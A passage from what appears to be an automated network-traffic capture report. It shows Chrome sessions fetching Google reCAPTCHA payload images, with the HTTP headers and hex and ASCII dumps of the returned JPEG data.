                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  61192.168.2.1649785142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1170OUTGET /recaptcha/api2/payload?p=06AFcWeA7MXNoyJ98S8vYaKLVqOcyY96RFM577XE7fN75VpW1iO88SKR5BFLUDXQYN6ZT6AAmlO5WeZkMpc217Wa4fJBZT26_qOGNLjCXPfphKnud4CrzjckIdyCYWEqv14VONcvyKT8Ae4OUaDk2THegyHWo61miM2k-HD_c9WTjFQEYHMJcaBeKaAzWmtGr9qkrxck0w5AXU0-5jarhqehysIrtBXSiUYQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:13 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:13 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC697INData Raw: 61 34 61 63 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 2c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: a4acJFIFC!"$"$C,,"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1378INData Raw: e9 9e b9 e4 9c 8c 67 aa 08 c0 60 77 01 1b 29 07 72 88 59 49 61 83 90 0f 53 92 08 18 eb f5 ae b5 a7 cb fa b7 f5 fe 67 96 ac 9e 8b fa d9 7d cb f1 1b ba 45 05 03 08 00 6f 34 e2 4f 94 71 b4 00 c7 1c 1e dd 46 00 a6 af 96 51 e5 89 a5 53 b0 2c 6e c4 05 d8 14 80 18 81 d3 2b 8f 62 de e7 36 50 c0 cf 1c 72 23 93 23 0c 21 1d 32 49 c8 20 e1 58 e7 18 1c 1e 73 81 c9 44 75 74 75 46 5f 29 02 e0 c4 fb 8c ad 8c 0c 16 39 04 1e 31 9c 0c e3 9c d3 ba b5 8d 62 92 d8 83 cc ba 48 54 a5 c4 7b e4 50 3c c7 95 98 28 6c 73 9e 98 2c 0f 73 fd 0c d0 c4 1e e4 a4 81 98 46 b8 2c cf 95 24 39 60 a4 f0 78 f3 39 19 cf af 20 65 a8 0f 99 80 eb 31 68 b2 a1 86 e7 3d 40 6d e7 3d 57 38 04 13 ce 39 a9 96 d0 08 63 44 96 27 90 81 c3 29 0e 36 29 ea 01 1b 9b 2c 79 24 74 c7 19 a3 ae 9a 7f 98 9c 94 b4 7a 79
                                                                                                                                                                                                                                                                  Data Ascii: g`w)rYIaSg}Eo4OqFQS,n+b6Pr##!2I XsDutuF_)91bHT{P<(ls,sF,$9`x9 e1h=@m=W89cD')6),y$tzy
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1378INData Raw: ee 1b 58 80 71 9c 57 b0 a5 dd a4 57 df 62 7b b8 56 ee 3e 4c 5b c1 74 5c 13 92 0e 3d b9 e3 3f 85 7b f9 2d 55 37 51 af 2f d4 e7 c5 47 54 ef fd 7f 5f d2 19 2d b8 3c bc 83 ef 9f 98 0c 11 bb 00 64 63 e5 00 0f ca a3 54 11 44 24 94 37 97 9c 80 06 de 83 91 f8 f1 fe 71 5a 8b 0a 85 2e bb 30 0a c7 9d aa 70 4f 4e df ae 46 33 44 31 79 32 45 26 57 07 96 76 93 a9 38 3f 37 3d fd 6b d9 73 4b 46 ce 5e 56 b4 b9 57 ec 91 47 06 70 70 4e c0 aa 3e 65 39 27 38 e3 3c e3 9a af 0a c7 24 91 97 56 78 da 22 77 f0 77 02 4f 07 3d 48 fd 38 e2 b6 e1 8c 4b 0c 8b 2c db 4a 1f 98 0c 02 a4 f0 7a 63 b9 1f 4c f7 cd 50 78 01 64 77 ce 4c a4 b1 44 c8 e7 1e d8 e9 ef ed f5 95 2b de fb 94 e3 63 36 e0 a9 7f 28 b0 89 4c 44 c9 92 37 00 58 1f e4 41 f7 a8 51 52 09 c0 71 f2 16 25 58 90 14 10 49 ee 0e 3a f3
                                                                                                                                                                                                                                                                  Data Ascii: XqWWb{V>L[t\=?{-U7Q/GT_-<dcTD$7qZ.0pONF3D1y2E&Wv8?7=ksKF^VWGppN>e9'8<$Vx"wwO=H8K,JzcLPxdwLD+c6(LD7XAQRq%XI:
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1378INData Raw: 41 44 73 d3 3d 79 e8 78 ed 59 d2 24 17 12 49 15 ba 94 3b 8c 8e 30 15 b1 b7 91 8c f2 3a 01 cf 5a 21 28 c7 54 37 52 32 d7 a9 9b 1c eb f6 66 5d c8 a9 b4 6d 0a 08 c7 3d 32 7a 9e 3a ff 00 91 7f c2 ba 51 d7 fc 47 67 6b 75 79 25 b5 b5 c4 80 3c c6 20 c1 54 70 48 04 80 7e 99 f4 ad 7d 2f 48 b1 59 62 b9 9e 49 1d 42 a8 91 17 80 d9 04 75 c7 7f f3 c0 c0 ec f4 2d 47 46 d3 a4 8e 38 6d 61 6b 90 83 69 0a 64 30 2f 77 19 eb c1 03 8e f5 35 31 71 5a 45 5c 8e 74 f4 39 5f 14 78 66 7b 4d 54 8d 14 2a c4 60 41 b6 25 27 6c 81 42 b8 24 9e bb 81 3d 4e 01 fa 55 8b 7f 09 dc e9 97 11 4b 73 6a cf 08 da 43 90 db f2 40 39 0c 0f 5e 08 04 e3 a7 15 d7 58 6b 01 b5 5d e4 c4 2d d7 e6 6c 00 c7 19 c0 21 88 cf 03 38 ea 3a d5 3f 1d f8 a2 c4 cc 4a 5c 4b 2f 07 66 e4 ea 41 c1 e0 77 39 3d 7d eb 8f eb 15
                                                                                                                                                                                                                                                                  Data Ascii: ADs=yxY$I;0:Z!(T7R2f]m=2z:QGgkuy%< TpH~}/HYbIBu-GF8makid0/w51qZE\t9_xf{MT*`A%'lB$=NUKsjC@9^Xk]-l!8:?J\K/fAw9=}
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1378INData Raw: 12 45 16 63 f3 24 87 e7 2d 86 3b 54 e3 81 c1 c9 3d 72 3e ed 3b 4b 09 20 54 86 df 0b 96 1b 36 0c 2b ed c1 1e 84 00 31 8e fd b1 cd 24 e7 cb 79 db fd 5c 89 ba 43 99 00 cb 67 86 db 81 dc 76 23 a0 fc 1d 34 42 d4 b4 73 9d b1 3c 6c ad c6 c8 ca 01 b7 38 5e 83 07 b1 ea dd 0e 70 4e 9c a8 a8 c7 9b 77 ab 10 08 e4 43 e6 c7 0b 83 f3 8f dd 85 ed 9d c1 72 48 18 1c e3 3f 87 15 1e 25 46 32 c2 b6 d2 23 a3 4a 9b 4f 01 71 8e 09 3b 81 e0 0c 0c 81 9f 5e 92 b2 95 95 25 68 25 89 10 0d ca 06 e6 38 50 19 53 03 90 33 8c fb f4 ea 69 64 57 86 e8 ee 77 8e d7 0c 13 6c 7b f7 0e 0f 39 e3 20 97 1d 7b 8c f2 0e 69 2b bb 09 24 f6 23 78 ae 4e 25 06 66 0e fe 5a 87 1f 36 e5 52 d8 20 e7 a9 1d fd 47 5e 4d 2a db b8 91 a2 8e 44 68 c8 01 4b 95 1d 79 5d c3 90 38 07 00 8e 02 83 91 cd 3e e2 25 8d 1e dd
                                                                                                                                                                                                                                                                  Data Ascii: Ec$-;T=r>;K T6+1$y\Cgv#4Bs<l8^pNwCrH?%F2#JOq;^%h%8PS3idWwl{9 {i+$#xN%fZ6R G^M*DhKy]8>%
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1378INData Raw: d7 af 61 ce 7f 1a f9 86 4d 5f c4 b7 77 71 c4 be 30 be 8a 36 6f 9c 0b d6 21 98 72 08 f9 b8 53 92 77 67 b5 7a 37 89 7c 71 a3 0d 27 4b d3 21 d4 8d ed d5 b4 4a 6e ae 12 e7 3b a4 55 1b 86 72 7f da 19 fe 75 35 31 36 5c c6 b1 a4 e5 2b 1d a6 ab e2 4b 4d 3a 6c 61 25 47 8d 99 54 b6 d0 58 63 00 91 c0 18 27 9f a7 4a 9f 4d f1 36 9b 7b a7 8b d7 8b c9 66 93 79 c9 e5 4e 3b 71 d0 71 c1 cf e9 5e 3c 23 bd f1 15 c4 b6 da 46 59 f8 76 59 d8 46 4e e2 a0 f5 fa 8e 9f 5a e5 ad b5 bd 42 d6 07 55 94 c4 88 fb 99 0a ef 52 bf 77 07 39 03 70 27 3d ba 1a e5 86 36 4e 57 66 f2 c1 c3 93 4d cf a0 13 c5 1a 73 5c 5c b2 a4 ad 67 06 dd d2 28 3c ef ce 01 e0 8f e1 27 df 19 ab 72 df 7f 6d 58 a2 69 8f b1 4c aa 66 9b 71 06 34 04 70 08 eb cf a1 00 f1 c9 ef e5 31 eb f1 45 e1 fd 76 4d 3f 52 89 37 41 0b
                                                                                                                                                                                                                                                                  Data Ascii: aM_wq06o!rSwgz7|q'K!Jn;Uru516\+KM:la%GTXc'JM6{fyN;qq^<#FYvYFNZBURw9p'=6NWfMs\\g(<'rmXiLfq4p1EvM?R7A
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1378INData Raw: 7b 7b 56 73 23 47 85 52 a8 99 ee c0 31 3f c8 8e b8 35 72 d7 59 9a 29 55 d2 0b 69 1e 30 76 19 a2 05 41 3f c4 32 4f b7 e7 c1 aa d7 52 2c d3 3d dc eb b9 a5 76 65 5d e3 e4 00 9c 71 db b8 03 a7 f5 ec 87 32 dd 11 2e 56 f4 09 0b 49 1a 42 cb e6 39 4c 29 c9 cf fc 0b 8f 41 d3 3c e6 98 4d ba 8f 99 50 e7 8c 96 fb 9c e7 39 f6 e7 d0 9c 77 34 d5 9d 41 f3 7c ad b2 a7 ca 01 71 c7 5c 70 06 7f fa d5 23 c8 ac 53 29 e5 85 27 ee 1e a0 11 c9 ef 83 9c 71 d8 53 51 e8 2b 6e 4b 6e 05 d5 d3 c0 83 74 b2 70 a0 8d b8 1d f3 8f a0 fd 6a d9 bc d4 21 91 e3 f3 1e 42 08 05 8f 21 78 23 1d 38 3d 0f f9 35 49 66 78 db cc dc fe 63 72 a5 57 a7 73 81 9e 79 06 9d 35 b5 d4 68 b7 37 f6 d7 16 f1 b2 ab 47 23 c4 c3 78 cf 6c 80 08 18 27 39 ed 52 e3 7d c5 6e a4 cb b6 57 48 ed 9e 69 0f dd 05 4f 24 0c 60 1c
                                                                                                                                                                                                                                                                  Data Ascii: {{Vs#GR1?5rY)Ui0vA?2OR,=ve]q2.VIB9L)A<MP9w4A|q\p#S)'qSQ+nKntpj!B!x#8=5IfxcrWsy5h7G#xl'9R}nWHiO$`
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1378INData Raw: a5 8d 08 44 59 5e 3c 95 2c 00 cf af 20 8e 95 f4 f3 e4 94 7d d5 f8 2f cf e7 f8 1f 3c a9 55 bd e5 2d 3f 0b 6c fe 7a bf 91 bf e3 79 86 89 39 d5 66 d4 ee 3c 8b a2 6d e3 85 0e 04 7b 61 91 b8 3d 0e 42 f1 c0 39 1f 80 e1 1f e2 03 1b 2d 36 0b 79 b5 38 9d e1 65 12 7d a8 1d 80 ca 54 b9 06 33 8c 01 8c 67 b5 7a 9f 88 34 bb 2d 52 cb 75 d4 4d fb 99 3c c4 09 2e c2 49 42 80 16 ed 95 63 f9 fe 59 96 be 0b f0 6d a8 81 2d ec 24 56 b5 70 d0 b3 c8 e3 07 3b b1 9e fc 75 e3 b8 ac 6a 2a 8e ea 9e ff 00 f0 0e b8 b7 cd 75 aa eb fa 7c bf 42 9e a1 a7 cc de 20 d2 2d bf b4 6e a5 df 34 91 34 b7 12 8d cd 98 d8 9d 88 3f dd f5 ee 2b cd 2e 3c 50 a6 c6 ee f2 d1 ad 12 e2 cc b2 af 99 bd e5 61 bf 0c 8c a4 9e 08 1e 98 e3 15 ec fa d4 5b f5 fd 0d de 20 c6 39 64 90 e4 6e 2b 88 f1 9c 9f 4e 38 fa 57 2f
                                                                                                                                                                                                                                                                  Data Ascii: DY^<, }/<U-?lzy9f<m{a=B9-6y8e}T3gz4-RuM<.IBcYm-$Vp;uj*u|B -n44?+.<Pa[ 9dn+N8W/
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1378INData Raw: 21 ed 5e 2b a8 d9 d9 0a 8c 80 ca 57 0b ec dd bd 73 58 7e 1c b2 f1 4e 91 a7 eb d6 da 8e 93 7f 03 9b 16 58 a3 9a 07 fd eb 1d aa 7a f0 78 60 00 1d b8 f6 33 fc 41 f1 cf 8e 7c 03 e2 eb bf 0f 5d 5e 5b 93 6a 44 91 13 6e aa ae bd 54 f0 a0 ff 00 5f 7a 66 89 f1 f3 c5 6c 63 6b fb b8 26 8d 8a 90 86 d9 48 19 6e 41 66 c8 03 be 79 e9 ed 53 ec 24 d6 86 ee b2 bd 92 d4 b5 f0 be d7 52 4f 12 e9 f7 53 5a c7 63 6f 08 59 1e 39 d8 23 ca 80 9f ba bd 4e 31 9e 01 c7 b5 73 ba 5f c4 af 13 d9 16 85 ae 2e c3 3b 15 c1 91 91 91 89 38 1d 88 c7 e9 c5 7b b7 c3 cf 17 7f c2 71 b4 42 b6 ad 79 02 b4 f1 aa 46 16 44 e0 a3 3a 73 b4 91 92 a4 1c e3 23 d4 13 1d ff 00 8c fc 05 ad 6b 53 69 5a a5 84 0c e9 74 d6 6d 77 3d 88 f2 c3 02 50 80 e0 e4 e0 82 bc 70 7b 56 6e 16 dd 94 d2 8b d3 f0 3c eb c5 1e 24 d5
                                                                                                                                                                                                                                                                  Data Ascii: !^+WsX~NXzx`3A|]^[jDnT_zflck&HnAfyS$ROSZcoY9#N1s_.;8{qByFD:s#kSiZtmw=Pp{Vn<$
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC1378INData Raw: f0 73 d7 ad 63 2c 17 24 ef 76 d2 ec 6a ab 49 c3 55 a9 53 48 f1 ad 85 d6 a2 2d a5 99 a3 f3 18 46 0c a0 02 8e 70 37 60 f2 14 8e 31 9c 71 9a c0 f8 bb a5 79 9a 84 1a 46 99 ab d8 b6 9d 1c 7b 9a 45 9d a4 05 5d be 56 c7 5c a6 01 19 3f c7 c7 4a c1 d5 fc 0b 2c da ce 89 0d ae 9f 71 24 53 5a 89 af 42 0d 8a 84 9d dc 91 c0 1b 73 cd 77 2b e0 9d 46 5f 22 29 e5 16 76 ed 82 11 d3 24 0c 85 20 64 f5 c0 0a 01 c7 6f 6c 69 08 51 c3 4e 2e 1b f9 98 ce a4 ea 5e 29 d9 7f 5f a7 de 79 0f c4 ab 2b 5f 0e e9 5a 4d be 9e d2 dd 46 ed 29 94 cb 10 8f 38 d9 82 0e 4f ab 75 1c 66 b8 c9 35 09 1e 72 02 05 32 21 0f b8 ee 63 db af 03 bf 5f 6f 7a f4 ef da 07 45 7d 26 6d 18 f9 91 30 99 a6 f2 c2 20 46 05 4c 59 e4 9e bc 8f a0 f5 ea 7c a5 e2 31 a9 62 53 70 39 3b 57 76 7e a3 fa fb d7 b7 85 6a ad 25 39
                                                                                                                                                                                                                                                                  Data Ascii: sc,$vjIUSH-Fp7`1qyF{E]V\?J,q$SZBsw+F_")v$ doliQN.^)_y+_ZMF)8Ouf5r2!c_ozE}&m0 FLY|1bSp9;Wv~j%9


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  62192.168.2.1649791142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:14 UTC838OUTGET /recaptcha/api2/payload?p=06AFcWeA7MXNoyJ98S8vYaKLVqOcyY96RFM577XE7fN75VpW1iO88SKR5BFLUDXQYN6ZT6AAmlO5WeZkMpc217Wa4fJBZT26_qOGNLjCXPfphKnud4CrzjckIdyCYWEqv14VONcvyKT8Ae4OUaDk2THegyHWo61miM2k-HD_c9WTjFQEYHMJcaBeKaAzWmtGr9qkrxck0w5AXU0-5jarhqehysIrtBXSiUYQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:15 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:15 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC697INData Raw: 61 34 61 63 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 2c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: a4acJFIFC!"$"$C,,"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC1378INData Raw: e9 9e b9 e4 9c 8c 67 aa 08 c0 60 77 01 1b 29 07 72 88 59 49 61 83 90 0f 53 92 08 18 eb f5 ae b5 a7 cb fa b7 f5 fe 67 96 ac 9e 8b fa d9 7d cb f1 1b ba 45 05 03 08 00 6f 34 e2 4f 94 71 b4 00 c7 1c 1e dd 46 00 a6 af 96 51 e5 89 a5 53 b0 2c 6e c4 05 d8 14 80 18 81 d3 2b 8f 62 de e7 36 50 c0 cf 1c 72 23 93 23 0c 21 1d 32 49 c8 20 e1 58 e7 18 1c 1e 73 81 c9 44 75 74 75 46 5f 29 02 e0 c4 fb 8c ad 8c 0c 16 39 04 1e 31 9c 0c e3 9c d3 ba b5 8d 62 92 d8 83 cc ba 48 54 a5 c4 7b e4 50 3c c7 95 98 28 6c 73 9e 98 2c 0f 73 fd 0c d0 c4 1e e4 a4 81 98 46 b8 2c cf 95 24 39 60 a4 f0 78 f3 39 19 cf af 20 65 a8 0f 99 80 eb 31 68 b2 a1 86 e7 3d 40 6d e7 3d 57 38 04 13 ce 39 a9 96 d0 08 63 44 96 27 90 81 c3 29 0e 36 29 ea 01 1b 9b 2c 79 24 74 c7 19 a3 ae 9a 7f 98 9c 94 b4 7a 79
                                                                                                                                                                                                                                                                  Data Ascii: g`w)rYIaSg}Eo4OqFQS,n+b6Pr##!2I XsDutuF_)91bHT{P<(ls,sF,$9`x9 e1h=@m=W89cD')6),y$tzy
                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC1378INData Raw: ee 1b 58 80 71 9c 57 b0 a5 dd a4 57 df 62 7b b8 56 ee 3e 4c 5b c1 74 5c 13 92 0e 3d b9 e3 3f 85 7b f9 2d 55 37 51 af 2f d4 e7 c5 47 54 ef fd 7f 5f d2 19 2d b8 3c bc 83 ef 9f 98 0c 11 bb 00 64 63 e5 00 0f ca a3 54 11 44 24 94 37 97 9c 80 06 de 83 91 f8 f1 fe 71 5a 8b 0a 85 2e bb 30 0a c7 9d aa 70 4f 4e df ae 46 33 44 31 79 32 45 26 57 07 96 76 93 a9 38 3f 37 3d fd 6b d9 73 4b 46 ce 5e 56 b4 b9 57 ec 91 47 06 70 70 4e c0 aa 3e 65 39 27 38 e3 3c e3 9a af 0a c7 24 91 97 56 78 da 22 77 f0 77 02 4f 07 3d 48 fd 38 e2 b6 e1 8c 4b 0c 8b 2c db 4a 1f 98 0c 02 a4 f0 7a 63 b9 1f 4c f7 cd 50 78 01 64 77 ce 4c a4 b1 44 c8 e7 1e d8 e9 ef ed f5 95 2b de fb 94 e3 63 36 e0 a9 7f 28 b0 89 4c 44 c9 92 37 00 58 1f e4 41 f7 a8 51 52 09 c0 71 f2 16 25 58 90 14 10 49 ee 0e 3a f3
                                                                                                                                                                                                                                                                  Data Ascii: XqWWb{V>L[t\=?{-U7Q/GT_-<dcTD$7qZ.0pONF3D1y2E&Wv8?7=ksKF^VWGppN>e9'8<$Vx"wwO=H8K,JzcLPxdwLD+c6(LD7XAQRq%XI:
